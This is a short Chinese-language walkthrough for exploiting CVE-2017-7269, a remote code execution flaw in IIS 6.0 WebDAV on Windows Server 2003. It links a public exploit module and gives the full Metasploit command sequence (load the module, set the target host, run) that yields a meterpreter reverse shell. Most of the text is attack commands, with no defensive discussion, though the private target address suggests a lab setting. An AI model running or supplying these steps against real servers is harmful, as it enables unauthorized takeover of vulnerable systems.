CVE-2017-7269(IIS远程代码执行)
利用CVE-2017-7269让IIS向自己的msf反弹一个shell
漏洞编号:CVE2017-7269
服务器版本:Windows server 2003
中间件:IIS6.0
攻击工具:metasploit
POC:CVE2017-7269.rb
exp:https://github.com/zcgonvh/cve-2017-7269
1. 确认目标是IIS并且开启webdav
2.打开msf,使用exp
msfconsole
use exploit/windows/iis/cve-2017-7269
set rhost 192.168.91.129
show options
run
获得一个meterpreter